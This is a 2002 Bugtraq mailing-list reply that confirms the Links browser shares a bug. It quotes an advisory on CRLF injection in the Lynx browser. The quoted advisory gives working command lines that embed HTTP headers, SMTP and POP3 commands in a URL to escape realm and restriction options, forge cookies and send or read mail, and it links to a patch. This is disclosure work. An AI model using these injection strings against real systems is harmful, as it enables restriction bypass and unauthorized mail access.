Bugtraq mailing list archives
Re: Lynx CRLF Injection, part two
From: Alberto Devesa <alberto.devesa () m-centric com>
Date: Fri, 23 Aug 2002 11:09:21 +0200
The same bug seems to affects to the links browser. I have tested it with the 0.96 version. Links is another console browser with extended capabilities not supported by lynx like frames, colors and menus. On Thursday 22 August 2002 19:32, Ulf Harnhammar wrote:
Lynx CRLF Injection, part two This is a follow-up to my "Lynx CRLF Injection" post a few days ago. * Lynx has got a realm feature that restricts users from accessing any host apart from the host of its start page. That is, if you start Lynx with "lynx -realm http://www.site1.st/", you are not allowed to go to http://www.site2.st/ . The CRLF Injection security hole allows users to break out of realms - the command: $ lynx -realm "http://www.site1.st/ HTTP/1.0 Host: www.site2.st " will show site2.st, despite the fact that it is outside of the realm. * It allows users to send arbitrary cookies, user agents and referers to a web server - even if you're using a restrictions option saying that you're not allowed to change user agent: $ lynx -restrictions=useragent "http://www.site1.st/ HTTP/1.0 User-Agent: Ulf 0.0 Referer: http://www.metaur.nu/ Cookie: user=ulf " * It is also possible to use this hole for communication with other types of servers than HTTP servers. You can send e-mails with it, for example - even if you're using a restrictions option saying that you're not allowed to send e-mails: $ lynx -restrictions=mail "http://mail.site1.st:587/ HTTP/1.0 HELO my.own.site MAIL FROM: <my.own@mail.address> RCPT TO: <info () site1 st> DATA From: my.own@mail.address To: info () site1 st Subject: This is.. This is a URL that sends an e-mail (?). . QUIT " You have to use port 587, as Lynx blocks port 25. The MTA will complain about the "GET / HTTP/1.0" string, but it still works. * You can even use this hole for reading e-mails from a POP3 server: $ lynx "http://mail.site1.st:110/ HTTP/1.0 USER ulf PASS xxxx LIST RETR 1 QUIT " The POP3 server will also complain about the "GET / HTTP/1.0" string, but it still works with this technology as well. * As previously noted, the holes listed above mostly affects programs that start Lynx, interactively or not, with a URL wholly or partially under the user's control. * The patch for this hole has moved to: ftp://lynx.isc.org/lynx/lynx2.8.4/patches/lynx2.8.4rel.1c.patch // Ulf Harnhammar ulfh () update uu se
Current thread:
- Lynx CRLF Injection, part two Ulf Harnhammar (Aug 22)
- Re: Lynx CRLF Injection, part two Alberto Devesa (Aug 23)
- Re: Lynx CRLF Injection, part two Ulf Harnhammar (Aug 23)
- Re: Lynx CRLF Injection, part two Petr Baudis (Aug 29)
- Re: Lynx CRLF Injection, part two Alberto Devesa (Aug 23)